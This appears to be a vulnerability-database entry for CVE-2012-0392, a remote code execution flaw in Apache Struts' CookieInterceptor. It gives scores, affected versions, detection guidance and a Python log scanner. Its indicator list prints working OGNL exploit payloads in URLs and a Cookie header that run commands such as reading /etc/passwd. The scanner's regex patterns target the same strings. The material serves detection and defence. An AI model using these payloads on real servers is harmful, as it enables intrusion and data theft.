CVE-2012-0392
published 2012-01-08


Priority P268 · medium · 6.8 · CVSS 2.0
Vector: AV:N/AC:M/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 96.79% (99.9th percentile)
The CookieInterceptor component in Apache Struts before 2.3.1.1 does not use the parameter-name whitelist, which allows remote attackers to execute arbitrary commands via a crafted HTTP Cookie header that triggers Java code execution through a static method.

Affected

1 range

Vendor   Product   Version range        Fixed in
apache   struts    >= 2.0.0 < 2.3.1     2.3.1

Detection & IOCs (extracted from sources)

url: /devmode.action?debug=command&expression=(%23_memberAccess[%22allowStaticMethodAccess%22]%3Dtrue%2C%23foo%3Dnew%20java.lang.Boolean(%22false%22)%20%2C%23context[%22xwork.MethodAccessor.denyMethodExecution%22]%3D%23foo%[email protected]@toString(@java.lang.Runtime@getRuntime().exec(%27cat%20/etc/passwd%27).getInputStream()))
url: /Test.action?id='%2b(%23_memberAccess["allowStaticMethodAccess"]=true,@java.lang.Runtime@getRuntime().exec('calc'))%2b'
url: /Test.action?debug=command&expression=%23_memberAccess["allowStaticMethodAccess"]=true,@java.lang.Runtime@getRuntime().exec('calc')
cookie: (#_memberAccess["allowStaticMethodAccess"]\u003dtrue)(x)=1; x[@java.lang.Runtime@getRuntime().exec('calc')]=1
  • Exploit targets the /devmode.action endpoint with the 'debug=command' parameter and an OGNL expression in the 'expression' parameter to achieve RCE; monitor HTTP GET requests to this path.
  • Malicious HTTP Cookie header contains OGNL expressions with '#_memberAccess["allowStaticMethodAccess"]' set to true and direct Runtime.exec() calls; inspect Cookie headers for these patterns.
  • Shodan/FOFA fingerprinting queries identify exposed Struts2 instances; use these to find potentially vulnerable internet-facing assets.
  • The vulnerability is triggered via the CookieInterceptor when cookie names are evaluated as OGNL expressions; look for HTTP requests to Struts .action endpoints accompanied by anomalous Cookie headers containing Java class references.
  • The vulnerability only applies when the CookieInterceptor is active in the Struts2 configuration; applications not using CookieInterceptor are not affected via the cookie vector.
  • The devmode.action RCE vector (exploit #3) only applies when the application is running in developer mode; disabling developer mode removes this specific attack surface.
  • Struts2-core jars were included in Red Hat Fuse Service Works 6.0.0 and Single Sign On 7.3.0+ source packages via a Google Guice import; customers building artefacts from source may be at risk even if the product itself does not actively use Struts2.
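
The URL and Cookie patterns listed above, turned into a log-scanning check. This is an added example, not code from the advisory sources or from Apache Struts; the function names, indicator labels and sample requests are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Indicator strings taken from the samples and bullets on this page.
INDICATORS = {
    "member_access": re.compile(r"#_memberAccess", re.I),
    "static_access_toggle": re.compile(r"allowStaticMethodAccess", re.I),
    "deny_exec_toggle": re.compile(r"xwork\.MethodAccessor\.denyMethodExecution", re.I),
    "static_method_call": re.compile(r"@[\w.$]+@\w+\s*\("),  # OGNL @class@method(
}

def normalize(text, max_rounds=3):
    """Undo nested percent-encoding and \\uXXXX escapes before matching."""
    for _ in range(max_rounds):
        decoded = unquote(text)
        decoded = re.sub(r"\\u([0-9a-fA-F]{4})",
                         lambda m: chr(int(m.group(1), 16)), decoded)
        if decoded == text:
            break
        text = decoded
    return text

def inspect_request(target, cookie=""):
    """Return sorted indicator names found in a request target and Cookie header."""
    hits = set()
    for source, raw in (("url", target), ("cookie", cookie)):
        text = normalize(raw)
        hits.update(f"{source}:{name}"
                    for name, rx in INDICATORS.items() if rx.search(text))
    # debug=command plus an expression parameter on a .action endpoint
    parts = urlsplit(target)
    query = parse_qs(parts.query, keep_blank_values=True)
    if (parts.path.endswith(".action") and query.get("debug") == ["command"]
            and "expression" in query):
        hits.add("url:debug_command_expression")
    return sorted(hits)

# Constructed sample requests (target, Cookie header); the cookie is this page's sample.
SAMPLES = [
    ("/Test.action?debug=command&expression=%23_memberAccess[%22allowStaticMethodAccess%22]%3Dtrue", ""),
    ("/index.action", r'''(#_memberAccess["allowStaticMethodAccess"]\u003dtrue)(x)=1; x[@java.lang.Runtime@getRuntime().exec('calc')]=1'''),
    ("/index.action?page=2", "JSESSIONID=0123456789ABCDEF; theme=dark"),
]

if __name__ == "__main__":
    for target, cookie in SAMPLES:
        print(target[:40], "->", inspect_request(target, cookie) or "clean")
```

Matching runs on the decoded text, so percent-encoded and double-encoded forms of the same indicators are caught as well.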

CVSS provenance

nvd            v2.0   6.8   MEDIUM   AV:N/AC:M/Au:N/C:P/I:P/A:P
vendor_redhat         6.8   MEDIUM